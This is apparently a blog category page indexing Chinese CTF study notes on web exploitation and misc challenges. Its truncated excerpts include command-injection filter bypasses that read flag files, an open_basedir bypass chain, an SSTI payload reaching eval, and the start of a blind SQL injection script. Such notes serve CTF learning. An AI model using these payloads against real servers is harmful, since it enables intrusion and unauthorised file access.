ctf知识点总结
文章平均质量分 93
知识点总结
天问_Herbert555
努力把人生变成自己所期待的样子!
展开
-
RCE(命令执行)总结
命令执行简单过滤过滤cat,flag等关键词1,代替tac,more,head,nl ,sort2,使用转义符ca\t /fl\agcat fl''ag3,内联执行绕过拼接flag 1;a=fl;b=ag.php;cat$IFS$a$bcat$IFS$1`ls`=cat falg.php;cat index.php过滤空格%20、%09、$IFS$1、${IFS}、<>、<,{cat,flag}例;过滤目录分隔符例:<?php$res =原创 2020-07-29 23:20:39 · 7130 阅读 · 1 评论 -
ctfshow-反序列化
文章目录web254web255web256web257web258web254正常传参即可index.php?username=xxxxxx&password=xxxxxxweb255<?phpclass ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true;}$a = new ctfShowUser();echo urlencod原创 2021-08-25 16:31:48 · 7612 阅读 · 0 评论 -
XXE学习
文章目录CTFSHOW-XXEweb373CTFSHOW-XXEweb373原创 2021-09-13 09:40:22 · 566 阅读 · 0 评论 -
SSRF学习
文章目录基础知识基础知识实例初始化一个新的cURL会话并获取一个网页<?php// 创建一个新cURL资源$ch = curl_init();// 设置URL和相应的选项curl_setopt($ch, CURLOPT_URL, "http://www.runoob.com/");curl_setopt($ch, CURLOPT_HEADER, 0);// 抓取URL并把它传递给浏览器curl_exec($ch);// 关闭cURL资源,并且释放系统资源curl_clo原创 2021-09-10 16:19:27 · 508 阅读 · 0 评论 -
杂项_流量包类
工控modbus题目:I2S-协议分析题目提示公开协议,在协议过滤规则中过滤 modbus 协议:题目提示正常业务的异常内容,modbus 协议正常业务常用的功能码为 0-16,于是再对功能码进行一个一个的过滤,直到过滤到功能码 15:Modbus/TCP报文格式modbus功能码位置:功能码作用功能码向服务器指示将执行哪种操作。功能码 01 为读内部比特量输出状态;如告警、变位、故障、异常等。功能码 02 为读外部开关量输入状态;如光耦输入、继电器输入等。功能码 03 为读内原创 2021-08-23 10:06:12 · 536 阅读 · 0 评论 -
ctf中一些php特性(遇到不知道的就记录下来)
文章目录$GLOBALSphp优先级$GLOBALSPHP全局变量$GLOBALS引用全局作用域中可用的全部变量,用这个特性可以获得当前php页面里的变量值。php优先级and的优先级低于=所以本来True and False应该是等于false的,因为优先级的关系,先把True赋值给$a,然后执行and操作。...原创 2020-11-08 23:48:53 · 1628 阅读 · 0 评论 -
php://filter的各种过滤器
文章目录0x01 String Filters0x01 String Filters1,string.rot13string.rot13对字符串执行 ROT13 转换,ROT13 编码简单地使用字母表中后面第 13 个字母替换当前字母,同时忽略非字母表中的字符。2,string.toupperstring.toupper 将字符串转化为大写3,string.tolowerstring.toupper 将字符串转化为小写4,string.strip_tagsstring.strip_t原创 2020-10-27 00:08:35 · 9569 阅读 · 6 评论 -
利用session.upload_progress进行文件包含
前言又一种新的文件包含利用方法,记录一下复现过程。学习自:LFI 绕过 Session 包含限制 Getshell 利用session.upload_progress进行文件包含和反序列化渗透文章目录前言kali本地测试利用burp利用python脚本kali本地测试所有配置都为默认配置大概原理:利用session.upload_progress上传一个临时文件,该文件里面有我们上传的恶意代码,然后包含它,从而执行里面的代码。因为该文件内容清空很快,所以需要不停的上传和包含,在清空之前包含该原创 2020-10-26 01:04:27 · 4284 阅读 · 1 评论 -
PHP绕过disable_function限制
文章目录寻找未禁用函数寻找未禁用函数一些读取目录的函数:print_r(scandir("/"));var_dump(scandir("/"));读取文件的函数:highlight_file('flag.php');include('/flag');show_source();require();原创 2020-10-19 23:23:55 · 2891 阅读 · 0 评论 -
Bypass open_basedir
文章目录利用chdir()与ini_set()组合Bypass利用glob://伪协议Bypass利用chdir()与ini_set()组合Bypasspayload:获取目录:?a=chdir(%27img%27);ini_set(%27open_basedir%27,%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);ini_set(%27open_basedir%27,%27/%27);print_原创 2020-10-19 23:22:27 · 1561 阅读 · 1 评论 -
SQL注入总结
布尔盲注布尔型数字盲注fuzz11 结果12 结果22-1 结果1fuzz21 结果11^1 结果21^0 结果1常用语句^(ascii(substr((select(value)from(flag)),1,1))>1)脚本一(简单,效率低):import requestss=requests.session()flag = ''for i in range(1,50): for j in '{qwertyuiopasdfghjklzxcvbnm_@#原创 2020-07-25 11:03:25 · 3260 阅读 · 0 评论 -
杂项个人总结
图片0x01 lsb工具:cloacked-pixel-masterpython lsb.by extract xxx.png 1.txt 解密密码0x02工具:StegSolveBGR 3原色设置为0 提取LSB0x03给坐标信息 ,生成图片 用py#-*- coding:utf-8 -*-from PIL import Imageimport rex = 72 #x坐标 通过对txt里的行数进行整数分解y = 74 #y坐标 x*y = 行数im = Image原创 2020-08-16 18:08:37 · 1339 阅读 · 0 评论 -
模板注入总结(SSTI)
a. 获取变量[]所属的类名 {{[].__class__}}b. 获取list所继承的基类名 {{[].__class__.__base__}} c. 获取所有继承自object的类 {{[].__class__.__base__.__subclasses__()}}没有内置的os模块的类目录查询{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("原创 2020-02-14 11:15:38 · 5538 阅读 · 5 评论 -
DVWA-sql注入学习
文章目录SQL注入:1,sql注入基础知识2,DVWA之sql注入SQL注入:1,sql注入基础知识sql注入基础一,分类报错注入,盲注,union注入等。二,原理sql注入漏洞需满足以下两个条件:1,参数用户可控:前端传给后端的参数内容是用户可以改变的。2,参数代入数据库查询:传入的参数拼接到sql语句,且代入数据库查询。三,order by 用法1,order...原创 2019-11-14 10:16:31 · 1639 阅读 · 0 评论